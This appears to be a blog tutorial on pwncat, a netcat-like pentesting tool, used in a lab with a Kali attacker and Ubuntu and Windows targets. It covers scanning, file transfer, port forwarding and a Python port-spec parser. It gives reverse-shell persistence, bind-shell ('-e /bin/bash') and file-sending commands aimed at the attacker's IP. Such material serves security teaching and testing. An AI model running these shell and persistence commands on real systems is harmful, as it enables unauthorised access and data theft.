A Detailed Guide on Pwncat

Pwncat is an open-source Python tool, valued for its versatility, that offers a modern alternative to the traditional netcat utility. Built for network exploration, exploitation, and penetration testing, it combines a user-friendly interface with comprehensive functionality, making it straightforward to interact with network services during reconnaissance and vulnerability assessment.

The official documentation for this tool can be found at https://pwncat.org/

Table of Contents

  • Lab Setup
  • Installation
  • Usage
  • Port Scanning and Banner Grabbing
  • As a Listener
  • Reverse Shell (Windows)
  • Local Port Forwarding
  • Send and Receive Files
  • Bind Shell (Linux)
  • Advantages over Netcat
  • Conclusion

Lab Setup

In this article, we are going to show the usage of pwncat against both Linux and Windows target machines, as listed below:

Target Machines: Ubuntu (192.168.1.23), Windows (192.168.1.4)

Attacker Machine: Kali Linux (192.168.1.7)

Installation

pwncat can be installed using either pip or apt.

To install using apt, use the following command:

apt install pwncat

To install using pip, use the following command:

pip install pwncat

Usage

Port Scanning and Banner Grabbing

Pwncat can perform both port scanning and banner grabbing on the open ports by specifying a range of ports together with the --banner flag.

pwncat -z 192.168.1.23 1-100
pwncat -z 192.168.1.23 1-100 --banner

Pwncat is not limited to TCP ports: adding the -u flag to the above command scans UDP ports instead.

As a Listener

When used as a listener with --self-inject, pwncat maintains persistence by creating a file in the /tmp/ directory of the target. Therefore, if the connection is lost, a reverse shell can still be obtained on the same port that was used previously.

pwncat -l 1234 --self-inject /bin/bash:192.168.1.7:1234

The persistence can be verified by terminating the above connection and then running an rlwrap listener on the same port.

Pwncat can also create persistence on multiple ports, using the following command:

pwncat -l 1234 --self-inject /bin/bash:192.168.1.7:1234+2

It can be observed that, in addition to port 1234, the reverse shell can also be obtained on ports 1235 and 1236.
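The two port notations used in this guide, the -z scan range (1-100) and the --self-inject form 1234+2 (read above as ports 1234, 1235 and 1236), can be expanded with a small parser. This is an added example written for this guide, not pwncat's own code: the syntax it accepts follows the page's examples, and the comma-separated list and the cmd:host:ports split are assumptions.

```python
import re

# Assumed port-spec syntax, taken from this guide's examples (not pwncat's own parser):
#   "80"       a single port
#   "1-100"    an inclusive range, as used with -z port scanning
#   "1234+2"   a base port plus N further consecutive ports, as used in
#              --self-inject (1234+2 -> 1234, 1235, 1236)
# Comma-separated lists of these items are accepted as an assumed extension.
_SINGLE = re.compile(r"^(\d+)$")
_RANGE = re.compile(r"^(\d+)-(\d+)$")
_PLUS = re.compile(r"^(\d+)\+(\d+)$")


def _check(port: int) -> int:
    """Reject anything outside the valid TCP/UDP port range."""
    if not 1 <= port <= 65535:
        raise ValueError(f"port out of range: {port}")
    return port


def parse_ports(spec: str) -> list[int]:
    """Expand a pwncat-style port spec into a sorted, de-duplicated list."""
    ports: set[int] = set()
    for item in spec.split(","):
        item = item.strip()
        if m := _SINGLE.match(item):
            ports.add(_check(int(m.group(1))))
        elif m := _RANGE.match(item):
            lo, hi = int(m.group(1)), int(m.group(2))
            if lo > hi:
                raise ValueError(f"descending range: {item}")
            ports.update(_check(p) for p in range(lo, hi + 1))
        elif m := _PLUS.match(item):
            base, extra = int(m.group(1)), int(m.group(2))
            ports.update(_check(p) for p in range(base, base + extra + 1))
        else:
            raise ValueError(f"unrecognised port spec: {item!r}")
    return sorted(ports)


def parse_self_inject(arg: str) -> tuple[str, str, list[int]]:
    """Split a --self-inject argument of the form cmd:host:ports (as shown in the guide)."""
    # rsplit keeps any ':' inside the command intact; an IPv4 host is assumed.
    cmd, host, portspec = arg.rsplit(":", 2)
    return cmd, host, parse_ports(portspec)


if __name__ == "__main__":
    print(parse_ports("1-100")[:5], "...")
    print(parse_self_inject("/bin/bash:192.168.1.7:1234+2"))
```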

Reverse Shell (Windows)

To get a reverse shell from the Windows machine, a command from the reverse shell generator (https://www.revshells.com/) can be executed on the Windows machine.

Before executing the command copied from revshells.com, start a listener on port 4444 on the kali machine using the following command:

pwncat -l 4444

Local Port Forwarding

Install pwncat inside the Ubuntu machine using the following command:

pip3 install pwncat

After a reverse shell is obtained using the approach discussed in the As a Listener section, it was observed that an application is running internally on the Ubuntu machine on port 8080. To access that web application from our kali machine, we perform local port forwarding with the following command:

pwncat -L 0.0.0.0:5000 127.0.0.1 8080

After executing the above command, the web application can be accessed from the kali machine at the URL http://192.168.1.23:5000

Send and Receive Files

Besides the usage discussed above, pwncat can also be used to send and receive files. This starts with the installation of pwncat on the Ubuntu machine.

Then create a file named data.txt on the Ubuntu machine and start a listener on the kali machine, where the file is to be received.

To receive the file on the kali machine, the following command can be used:

pwncat -l 6666 > data.txt

Once the listener is active, the following command on the Ubuntu machine transfers the file to the kali machine:

pwncat 192.168.1.7 6666 < data.txt

Bind Shell (Linux)

To get a bind shell, use the following command on the kali machine:

pwncat 192.168.1.23 9874

Inside the Ubuntu machine, type the following command:

pwncat -l -e '/bin/bash' 9874 -k

It can be observed that the bind shell connection is obtained on the kali machine. Because of the -k flag used above, the bind shell will accept a new client as soon as the previous client has disconnected.

Note that the above procedure also works with UDP ports, simply by adding the -u flag to the command.

Advantages over Netcat

Pwncat, a feature-rich netcat-like tool designed for pentesters and red teamers, offers several enhancements over traditional Netcat:

  • Interactive Shell
  • Scriptable Interface
  • Encrypted Communication
  • Persistence

Pwncat provides an interactive shell with syntax highlighting and command completion, improving the user experience. Pentesters can automate tasks using Pwncat's Python scripting interface, allowing for greater flexibility and customization. It also supports encrypted communication channels, providing confidentiality when interacting with compromised systems.

Conclusion

In conclusion, pentesters and red teamers have many tools available for obtaining reverse shells and bind shells, uploading and downloading files, local port forwarding and more. However, if pwncat is adopted in regular practice, it can prove to be a very valuable and time-saving tool.

Originally published on Raj Chandel's Blog: A Detailed Guide on Pwncat

Copyright notice: posted by admin on 23 April 2024 at 8:20 PM.